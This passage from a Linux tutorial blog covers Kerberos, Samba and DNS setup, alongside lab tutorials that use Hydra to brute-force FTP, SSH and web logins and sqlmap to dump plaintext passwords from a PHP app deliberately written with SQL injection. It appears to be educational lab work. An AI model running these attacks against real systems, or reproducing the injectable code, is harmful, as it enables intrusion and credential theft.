              UUID=a0c5c5dc-fecb-4f97-9ecc-0ad371d78cbe /var/pub                xfs     defaults        0 0

           
     NOTE: 1) The passphrase has to be entered during the boot process.
                
                 2) To view the UUID of '/dev/sdb1'
                        blkid /dev/sdb1
                                         or
                        cryptsetup luksUUID /dev/sdb1
               3) To view the UUID of '/dev/mapper/data'
                        blkid /dev/mapper/data

Friday 17 April 2015

Attacking FTP and SSH using Hydra in Kali Linux


In this tutorial, we will launch an automated password guessing attack against a FTP Server and SSH server.

We will use 'hydra' in Kali Linux for the attack. We will provide 'hydra' with a wordlist of potential passwords. 'hydra' will try to authenticate using username 'shabbir' and the words in the wordlist as passwords.

1) Attacking FTP Server

root@kali:~# hydra -l shabbir -P /usr/share/wordlists/fasttrack.txt  ftp://192.168.122.1
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-17 19:58:04
[DATA] 16 tasks, 1 server, 133 login tries (l:1/p:133), ~8 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.122.1   login: shabbir   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 19:58:08

where 
  -l shabbir : 'shabbir' is the login name
 -P /usr/share/wordlists/fasttrack.txt : is the wordlist 
  ftp://192.168.122.1 : is the server being attacked

2) Attacking SSH Server

root@kali:~# hydra -l shabbir -P /usr/share/wordlists/fasttrack.txt  192.168.122.1 ssh -s 22
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-17 20:02:18
[DATA] 16 tasks, 1 server, 133 login tries (l:1/p:133), ~8 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.122.1   login: shabbir   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 20:02:22

where 
  -l shabbir : 'shabbir' is the login name
 -P /usr/share/wordlists/fasttrack.txt : is the wordlist 
  192.168.122.1 : is the server being attacked

SQL Injection Attack using sqlmap in Kali Linux


In this tutorial, we develop a sample web application and launch an SQL Injection attack against it, to grab the usernames and passwords from the database.

The Web application and database table is given below:

1) The login page 'cust_login.html'

cust_login.html
<html>
<body>
 <form method="get" action="cust_display.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'cust_display.php' displays the customer details


cust_display.php
<html>
<body>
<?php
$name = $_GET["name"];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select name,firstname,surname,address from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();
echo "firstname: " . $row["firstname"]. "<br>";
echo "surname: "   . $row["surname"].   "<br>";
echo "address: "   . $row["address"].     "<br>";

$conn->close();
?>
</body>
</html>


3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Launching SQL Injection attack against the web application

4.1) Fetch list of available databases
 root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir --dbs

available databases [6]:
[*] hacking
[*] information_schema
[*] mybank
[*] mysql
[*] performance_schema
[*] test

4.2) Fetch list of tables in database 'hacking'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking --tables

Database: hacking
[1 table]
+----------+
| customer |
+----------+


4.3) Fetch list of columns in table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer --columns

Database: hacking
Table: customer
[5 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| address   | varchar(200) |
| firstname | varchar(50)  |
| name      | varchar(50)  |
| passwd    | varchar(50)  |
| surname   | varchar(50)  |
+-----------+--------------+

4.4) Fetch list of 'username,password' from table 'customer'
root@kali:~# sqlmap -u http://www.mycompany.com/cust_display.php?name=shabbir -D hacking -T customer -C name,passwd --dump

Database: hacking
Table: customer
[4 entries]
+---------+--------+
| name    | passwd |
+---------+--------+
| pk      | aunty  |
| priya   | blue   |
| shabbir | admin  |
| taher   | hello  |
+---------+--------+

Thursday 16 April 2015

Hacking Web Login using Hydra in Kali Linux


In this tutorial, we will develop a sample web application and launch an online password attack against it. We will use 'hydra' in Kali LInux for the attack.

Given below is the PHP application and MySQL database table.
The application consists of 2 pages.
1) user_login.html
2) user_verify.php

1) The login page 'user_login.html'


user_login.html
<html>
<body>
 <form method="post" action="user_verify.php">
   <label for="name">User Name:</label>
   <input type="text" id="name" name="name" /><br />

   <label for="passwd">Password:</label>
   <input type="text" id="passwd" name="passwd" /><br />

   <input type="submit" value="login" name="submit" />
 </form>
</body>
</html>


2) The page 'user_verify.php' displays the below message on successful login.

user_verify.php
<html>
<body>
<?php
$name = $_POST['name'];
$passwd = $_POST['passwd'];

$conn = new mysqli("localhost","root","root","hacking");
if ($conn->connect_error){
    die("Connection failed:  " . $conn->connect_error);
}

$sql = "select * from customer where name = '" . $name . "'";
$result = $conn->query($sql);

$row= $result->fetch_assoc();

$pvalue = $row["passwd"];

if(strcmp($passwd,$pvalue) == 0){
        echo "login successful";
}else{
        echo "login error";
}
$conn->close();
?>
</body>
</html>

3) The MySQL database table Customer

 MariaDB [hacking]> desc customer;
+-----------+--------------+------+-----+---------+-------+
| Field     | Type         | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| name      | varchar(50)  | NO   | PRI | NULL    |       |
| passwd    | varchar(50)  | YES  |     | NULL    |       |
| firstname | varchar(50)  | YES  |     | NULL    |       |
| surname   | varchar(50)  | YES  |     | NULL    |       |
| address   | varchar(200) | YES  |     | NULL    |       |
+-----------+--------------+------+-----+---------+-------+


4) Using hydra to attack the above application. We provide a wordlist of passwords to hydra. If the password matches one of the words in our wordlist, we will successfully login to the application.

root@kali:~# hydra www.mycompany.com http-form-post "/user_verify.php:name=^USER^&passwd=^PASS^:login error"  -l priya -P /usr/share/wordlists/fasttrack.txt -t 10 -w 30 -o hydra_attack.txt

Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-16 23:17:22
[DATA] 10 tasks, 1 server, 133 login tries (l:1/p:133), ~13 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.122.1   login: priya   password: blue
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-16 23:17:23
root@kali:~#


where
       www.mycompany.com :- the website being attacked
       http-form-post             :- POST method is used to submit the form
       user_verify.php           :- password verifying script
       name=^USER^&passwd=^PASS^ :- form parameters
       login error                   :- the message displayed by the script on incorrect login
       -l priya                          :- the login name used to attack the website

       -P /usr/share/wordlists/fasttrack.txt :- the wordlist used for the attack
       -t 10                              :- run 10 tasks in parallel

       -w 30                             :- max amount of time to wait for response (in sec)
       -o hydra_attack.txt      :- output file

Kerberos Configuration in RHEL7/CentOS7

NOTE: 1) Ensure that DNS Server or '/etc/hosts' file  is configured for the network.
            2) Ensure that Time Synchronization is configured on all machines in the network.

Kerberos Realm: MYCOMPANY.COM
DNS Domain Name: mycompany.com
Kerberos Server: meru.mycompany.com

SSH Server: server1.mycompany.com
SSH Client: server2.mycompany.com

Configure Kerberos Server:


NOTE: All commands are to be executed as 'root' user.

1) Install packages.
[root@meru ~]# yum -y install krb5-server krb5-libs

2) Edit the file '/etc/krb5.conf'. Make the following changes.
     
       default_realm = MYCOMPANY.COM
       [realms]
       MYCOMPANY.COM = {
       kdc = meru.mycompany.com
       admin_server = meru.mycompany.com
       }

       [domain_realm]
       .mycompany.com = MYCOMPANY.COM
       mycompany.com = MYCOMPANY.COM


3) Edit the file '/var/kerberos/krb5kdc/kdc.conf'. Make the following changes.
       [realms]
        MYCOMPANY.COM = {
         #master_key_type = aes256-cts
         acl_file = /var/kerberos/krb5kdc/kadm5.acl
         dict_file = /usr/share/dict/words
         admin_keytab = /var/kerberos/krb5kdc/kadm5.keytab
         supported_enctypes = aes256-cts:normal aes128-cts:normal des3-hmac- sha1:normal arcfour-hmac:normal camellia256-cts:normal camellia128-cts:normal des-hmac-sha1:normal des-cbc-md5:normal des-cbc-crc:normal
       }

4) Open Firewall Ports. KDC - 88(tcp/udp) , kadmind - 749(tcp/udp)
[root@meru ~]# firewall-cmd --zone=public --add-service=kerberos --permanent 
[root@meru ~]# firewall-cmd --zone=public --add-port=749/tcp --permanent 
[root@meru ~]# firewall-cmd --zone=public --add-port=749/udp --permanent 
[root@meru ~]# firewall-cmd --reload

5) Create Kerberos database that stores keys for the kerberos realm.
[root@meru ~]# kdb5_util create -s

6) Edit the file '/var/kerberos/krb5kdc/kadm5.acl'. This file is used by 'kadmind' to determine which principals have admin access to the kerberos database.
       */admin@MYCOMPANY.COM   *


7) Create the first principal.
[root@meru ~]# kadmin.local -q "addprinc shabbir/admin"

8) Start Kerberos Service
[root@meru ~]# systemctl start krb5kdc 
[root@meru ~]# systemctl start kadmin


Configure SSH Server:

1) Install packages.
[root@server1 ~]# yum -y install krb5-workstation krb5-libs

2) Copy the file '/etc/krb5.conf' from the Kerberos Server (meru.mycompany.com).
[root@server1 ~]# scp root@meru.mycompany.com:/etc/krb5.conf  /etc/krb5.conf

 3) Create host principal in the kerberos database and extract keys for the host.
[root@server1 ~]# kadmin -p shabbir/admin -w shabbir
          kadmin:  addprinc -randkey host/server1.mycompany.com

          kadmin:  ktadd host/server1.mycompany.com
          kadmin:  quit 
 
4) Edit the file '/etc/ssh/sshd_config' and enable kerberos authentication.
       KerberosAuthentication yes
      KerberosTicketCleanup yes
      GSSAPIAuthentication yes
      GSSAPICleanupCredentials yes

5) Restart 'sshd' and make sure firewall port is open.
[root@server1 ~]# systemctl restart sshd

[root@server1 ~]# firewall-cmd --zone=public --add-service=ssh --permanent 
[root@server1 ~]# firewall-cmd --reload

Configure SSH Client:

1) Install packages
[root@server2 ~]# yum -y install krb5-workstation krb5-libs

2) Create user principal for user 'batul' in the kerberos database.
[root@server2 ~]# kadmin -p shabbir/admin -w shabbir        
          kadmin:  addprinc batul
          kadmin:  quit

3) Copy the file '/etc/krb5.conf' from the Kerberos Server (meru.mycompany.com)
[root@server2 ~]# scp root@meru.mycompany.com:/etc/krb5.conf  /etc/krb5.conf

4) Create user 'batul
[root@server2 ~]# useradd batul
[root@server2 ~]# passwd batul

5) Login as user 'batul' and obtain a  ticket.
[root@server2 ~]# su - batul

[batul@server2 ~]$  kinit batul

6) View the ticket
[batul@server2 ~]$  klist

7) Log in to the SSH Server. (server1.mycompany.com)
[batul@server2 ~]$ ssh batul@server1.mycompany.com


8) After quitting the ssh session, destroy the ticket.
[batul@server2 ~]$  kdestroy


Wednesday 15 April 2015

Linux & Windows File Sharing Using Samba in RHEL7/CentOS7

This tutorial has the following configuration:
- Samba Server IP Address:    192.168.122.1
- Samba Server Netbios Name: MERUBHAI

- Windows 7 IP Address:         192.168.122.156
- Windows 7 Netbios Name:    SHABBIR-PC

- Windows Workgroup Name: WORKGROUP
- The user account 'shabbir' exists on both linux and windows machines. This account is used for file sharing.


Samba Server Configuration:

NOTE:1) In the Samba config file '/etc/samba/smb.conf', lines starting with ';' or '#' are comments.
           2) All commands are to be run as 'root' user
           3) It is recommended to have the same username & password on both linux and windows machines.

1) Install Samba Server
      yum -y install samba samba-client

2) Edit the Samba config file '/etc/samba/smb.conf'. Make the following changes.

      workgroup = WORKGROUP     /'name of Windows workgroup'
      netbios name = MERUBHAI   /' name of server'
      interfaces = lo eth0 192.168.122.1/24    /'the network interfaces of the server'
      hosts allow = 127. 192.168.122.     /'hosts which are allowed to access the server

     NOTE: Remember to uncomment the above lines by removing the leading ';'

3) Check for config errors
       testparm

4) Create user account
       useradd shabbir
      passwd shabbir

5) Create user in Samba database.
       smbpasswd -a shabbir
       
6) Enable SELinux boolean to allow Samba to access the home directory.
       setsebool -P samba_enable_home_dirs on

7) Create the following public share
       [public]
        comment = Files shared by shabbir
        path = /var/pub/files
        public = yes
        writeable = yes
        printable = no


8) Create directory and create files in the dir.
        mkdir -p /var/pub/files
        touch /var/pub/files/foo{1,2,3,4,5}
        chown -R shabbir:shabbir /var/pub/files

9) Set SELinux file context for the shared directory
       chcon -R -t samba_share_t /var/pub/files

10) Open Firewall Ports.( 137/udp, 138/udp, 139/tcp, 445/tcp)
      firewall-cmd --zone=public --add-service=samba --permanent
      firewall-cmd --reload

11) Start Samba Service and enable on boot
       systemctl start smb
       systemctl start nmb

      systemctl enable smb
      systemctl enable nmb     



Windows Client Configuration:
1)

Open Network and Sharing Center.
Turn on Network Discovery and File Sharing for all public networks OR
Make this network a private network.
   
Click on Network.

2)


Click on MERUBHAI.


3)

Click on public.


4)



NOTE:
1)
To view/change workgroup , right click on My Computer , Select Properties.

2)
To view ip address, type ipconfig in command terminal.

To change ip address, open Network and Sharing Center.
Click on Change Adapter Settings.
Click on Local Area Network.
Click on Properties.
Select Internet Protocol Version 4. Click Properties.Enter IP address.
       
      
View Windows Shared Folders in Linux :


1) View Remote Shares
       smbclient -L 192.168.122.156  -U shabbir    /'windows ip and username'
       Enter shabbir's password:
       Domain=[SHABBIR-PC] OS=[Windows 7 Professional 7601 Service Pack      1]    Server=[Windows 7 Professional 6.1]

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    Users           Disk     

2) Create mount point and mount the remote share
       mkdir -p /mnt
      mount //192.168.122.156/Users  /mnt -o username=shabbir,password=pass

3) View shared folder contents
        ls /mnt

         Default  desktop.ini  Public  shabbir


4) Create entry in '/etc/fstab' to automatically mount at boot time.

       //192.168.122.2/Users           /mnt     cifs      rw,username=shabbir,password=pass      0  0

    This is a security risk as '/etc/fstab' is world-readable. So you can configure a dedicated credentials file which is readable only by 'root'.

       //192.168.122.2/Users           /mnt    cifs      rw,credentials=/etc/smbshabbir       0  0


   Create the file '/etc/smbshabbir'
       username=shabbir
      password=pass      

      
   chmod 600 /etc/smbshabbir







Caching-Only DNS Server in RHEL7/CentOS7


Recursive caching servers answer local users' queries about sites on the Internet.

A Caching-only DNS server will query other DNS servers and cache the response. Next time when the same query is given, it will provide the response from the cache. This will reduce the number of external queries and improve response time for users.

A Caching-only name server loads the addresses of the servers for the root domain from a startup file and accumulates the rest of its data by caching answers to the queries it resolves.

It is not advisable to configure 'bind' to work as your authoritative server for your own zones and as a caching server for your users. The function of serving your authoritative data to the world should be separated from serving the world's data to your users. 


DNS Server IP Address: 192.168.122.1


1) Install DNS Server
[root@meru ~]# sudo yum -y install bind bind-utils

2) Edit the configuration file '/etc/named.conf' and make the following changes.

//The network interface on which to listen for queries
           listen-on port 53 { 127.0.0.1; 192.168.122.1; };  

//Clients allowed to query the DNS Server
           allow-query     { localhost; 192.168.122.0/24; }; 

 //All queries are forwarded to this server. The use of a forwarder circumvents the normal DNS procedure of starting at a root server and following a chain of referrals.
         forwarders { 8.8.8.8; 8.8.4.4; }; 
 
//Optional. A forward only server caches values and queries forwarders, but it never queries anyone else. If the forwarders do not respond, queries will fail.
           forward only;    


4) Check the config files for errors.
[root@meru ~]# named-checkconf


5) Open Firewall Port
[root@meru ~]# firewall-cmd --zone=public --add-service=dns --permanent
[root@meru ~]# firewall-cmd --reload


6) Start the DNS Server
[root@meru ~]# systemctl start named

7) Enable on boot
[root@meru ~]# systemctl enable named

8) Check status
[root@meru ~]# rndc status
        CPUs found: 4
        worker threads: 4
        UDP listeners per interface: 4
        number of zones: 104
        recursive clients: 0/0/1000
        tcp clients: 0/100
        server is up and running



Client Configuration

1) Install package
[root@server2 ~]# yum -y install bind-utils

2) Edit the file '/etc/resolv/conf'. Add the following line
          nameserver 192.168.122.1

3) Query the DNS Server
[root@server2 ~]# dig @192.168.122.1 www.google.com

; <<>> DiG 9.9.4-RedHat-9.9.4-14.el7 <<>> www.google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51202
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 13, ADDITIONAL: 16

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.google.com.            IN    A

;; ANSWER SECTION:
www.google.com.        206    IN    A    173.194.36.51
www.google.com.        206    IN    A    173.194.36.49
www.google.com.        206    IN    A    173.194.36.50
www.google.com.        206    IN    A    173.194.36.48
www.google.com.        206    IN    A    173.194.36.52

;; AUTHORITY SECTION:
com.            111341    IN    NS    m.gtld-servers.net.